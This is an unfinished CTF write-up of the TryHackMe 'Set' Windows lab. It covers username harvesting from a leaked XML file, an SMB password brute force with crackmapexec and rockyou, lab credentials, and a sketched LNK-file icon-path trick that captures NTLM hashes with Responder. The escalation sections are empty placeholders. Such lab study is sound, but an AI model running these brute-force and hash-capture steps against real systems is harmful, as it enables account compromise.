*Set (THM)

TryHackMeSet Write-Up

topics: Web Application attacks, OWASP 10 (Broken Authenication), Active Directory, Windows Privilege Escalation

  1. Enumeration

  2. Local Privilege Escalation

  3. System Privilege Escalation

new tools: rpcdump, smbrute.py

Set is used as a platform for developers and has had some problems in the recent past. They had to reset a lot of users and restore backups (maybe you were not the only hacker on their network?). So they decided to make sure all users used proper passwords and closed of some of the loose policies. Can you still find a way in? Are some user more privileged than others? Or some more sloppy? And maybe you need to think outside the box a little bit to circumvent their new security controls

Enumeration

initial nmap scan .././autonmap.sh $ip Basic

We have three ports open, MSRPC, HTTPS, and SMB. The results also inform us to add seth.windcorp.thm to our hosts file. There is also a Windows Remote Management port open on 5985 and an additional MSRPC port on 49666. Lets first navigate to the website and then move on to SMB.

HTTPS

Navigating to the homepage of the HTTPS site returns a company website

A quick dirsearch scan turned up empty aside from forbidden directories, so we can look around the website or enumerate the 403 directories.

python3 dirsearch.py -u https://set.windcorp.thm/assets -e php,html,txt

These appear to be directories that host the source code of the website, we can snoop around these files in the debugger. Within the source code of the website we can see a hidden section of testimonials with usernames. The hint of the room suggested that they were previously hacked therefore making those usernames valuable.

There is a section highlighting team members with their full names being exposed which almost certainly will be of use.

Scrolling further, there appears to be a contact section with a search bar

We know of at least ten names associated with the company through the website, lets try searching for the CEO Max

This is an interesting revelation. The contact information and username of all users of the website is leaked through the search bar. Inspecting the JavaScript files loaded on the website reveals "assets/data/users.xml" a XML username file within the assets directory

This file contains many usernames belonging to the company.

We can sort these to obtain only the username and brute force valid accounts on the Set domain. The following command downloads the xml file, extracts the usernames, deletes empty spaces and stores them in a text file.

curl -k https://set.windcorp.thm -o user.xml | cat user.xml | awk -v FS="(<email>|@windcorp.thm</email>)" '{print $2}' | sed -r '/^\s*$/d' >> user.txt

SMB

Using a quick smbclient scan reveals we need credentials to enumerate SMB

We can brute force valid accounts with the usernames we acquired from the website with crackmapexec using the rockyou or common-SSH passwords.

crackmapexec smb set.windcorp.thm -u user.txt -p /root/payloads/rockyou.txt

We can see the valid credentials are myrtleowe:Passw@rd

Listing the shares with the new found credentials smbclient -L \\set.windcorp.thm -U myrtleowe

If we logon to the Files share we see the following.

The Info.txt file is the first flag of the room. We do not yet have access for evil-winrm

MSRPC

I experimented with the tool rpcdump from impacket

Nothing of note compared to the list on HackTricks, will come back if nothing from website

It was at this point where I was lost. We had extracted what we needed for SMB access, enumeration on MSRPC was not successful as I was disconnected each time I tried to use enumdomusers and basically all other useful commands. I needed some help.

The write-up taught me a bit of information that I hadn't heard of until now. The only piece of information we had left was that users were instructed to zip their projects and leave them in the Files share.

Apparently we have the ability to change the icon-path in a LNK-file and point it to a SMB-server to capture user password hashes. This can be done with responder and a tool called mslink

Results

Port/Service

Result

MSRPC

disconnected each time tried to enumerate

HTTPS

found 120 usernames on XML file hidden in website

SMB

brute force for valid username, lead to first flag and message to unzip certian file

Local Privilege Escalation

We can use the bash file of mslink to create a .lnk shortcut file to zip.

have to revist this technique it is not working properly.

w

w

w

System Privilege Escalation

w

w

w

Last updated